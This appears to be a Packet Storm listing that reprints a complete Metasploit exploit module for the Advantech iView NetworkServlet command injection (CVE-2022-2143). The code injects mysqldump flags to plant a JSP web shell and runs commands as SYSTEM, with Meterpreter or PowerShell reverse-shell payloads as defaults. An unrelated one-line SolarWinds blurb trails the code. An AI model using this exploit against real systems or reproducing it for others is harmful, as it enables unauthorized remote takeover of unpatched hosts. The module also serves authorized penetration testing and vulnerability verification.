Headline

Advantech iView NetworkServlet Command Injection

Advantech iView software versions prior to 5.7.04.6469 are vulnerable to an unauthenticated command injection vulnerability via the NetworkServlet endpoint. The database backup functionality passes a user-controlled parameter, backup_file to the mysqldump command. The sanitization functionality only tests for SQL injection attempts and directory traversal, so leveraging the -r and -w mysqldump flags permits exploitation. The command injection vulnerability is used to write a payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.

2 years ago

Packet Storm

Open in Source

#sql #vulnerability #web #windows #apache #js #git #java #rce #ldap #auth

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Advantech iView NetworkServlet Command Injection',        'Description' => %q{          Versions of Advantech iView software below `5.7.04.6469` are          vulnerable to an unauthenticated command injection vulnerability          via the `NetworkServlet` endpoint.          The database backup functionality passes a user-controlled parameter,          `backup_file` to the `mysqldump` command. The sanitization functionality only          tests for SQL injection attempts and directory traversal, so leveraging the          `-r` and `-w` `mysqldump` flags permits exploitation.          The command injection vulnerability is used to write a payload on the target          and achieve remote code execution as NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'y4er', # PoC          'Shelby Pace' # Metasploit module        ],        'References' => [          [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],          [ 'CVE', '2022-2143']        ],        'Platform' => [ 'win' ],        'Privileged' => true,        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],        'Targets' => [          [            'Windows Dropper',            {              'Arch' => [ ARCH_X86, ARCH_X64 ],              'Type' => :win_dropper,              'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }            }          ]        ],        'DisclosureDate' => '2022-06-28',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),        OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),        OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])      ]    )  end  def check    res = send_request_cgi!(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    return CheckCode::Unknown('Failed to receive a response from the application') unless res    unless res.body.include?('iView')      return CheckCode::Safe('No confirmation that target is Advantech iView')    end    res = send_db_backup_request('')    return CheckCode::Detected('Failed to receive response from backup request') unless res    # The patch added auth as a requirement for    # accessing the NetworkServlet endpoint    if res.body =~ /ERROR:\s+User\s+Not\sLogin/      @needs_auth = true      print_status('Vulnerability is present, though authentication is required.')    end    CheckCode::Appears  end  def send_db_backup_request(filename)    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),      'keep_cookies' => true,      'vars_post' =>      {        'page_action_type' => 'backupDatabase',        'backup_filename' => filename      }    )  end  def format_jsp    bin_nums = []    arg_nums = []    flag_nums = []    bin_param.each_char { |c| bin_nums << c.ord }    bin_nums = bin_nums.join(',')    arg_param.each_char { |c| arg_nums << c.ord }    arg_nums = arg_nums.join(',')    flag_param.each_char { |c| flag_nums << c.ord }    flag_nums = flag_nums.join(',')    '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \    'new ProcessBuilder(request.getParameter(' \    "new java.lang.String(new byte[]{#{bin_nums}}))," \    "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \    "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \    '.getInputStream()))%>'  end  def flag_param    @flag_param ||= Rex::Text.rand_text_alpha(3..8)  end  def arg_param    @arg_param ||= Rex::Text.rand_text_alpha(3..8)  end  def bin_param    @bin_param ||= Rex::Text.rand_text_alpha(3..8)  end  def jsp_filename    @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"  end  def execute_command(cmd, _opts = {})    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename),      'keep_cookies' => true,      'vars_get' =>      {        bin_param => 'cmd.exe',        flag_param => '/c',        arg_param => cmd      }    )  end  def iview_authenticate    res = send_request_cgi!(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')    vprint_good('Successfully accessed the login page')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'CommandServlet'),      'keep_cookies' => true,      'vars_post' => {        'page_action_service' => 'UserServlet',        'page_action_type' => 'login',        'user_name' => datastore['USERNAME'],        'user_password' => datastore['PASSWORD'],        'use_ldap' => 'false',        'data' => ''      }    )    unless res && res.body.include?('Success')      fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')    end    vprint_good('Authentication successful!')  end  def need_auth?    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'NetworkServlet')    )    return false unless res    !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)  end  def exploit    if @needs_auth || need_auth?      iview_authenticate    end    jsp_code = format_jsp    sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"    full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""    res = send_db_backup_request(full_cmd)    fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res    path = "webapps\\iView3\\#{jsp_filename}"    register_file_for_cleanup(path)    if target['Type'] == :win_dropper      execute_cmdstager    else      execute_command(payload.encoded)    end  endend

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.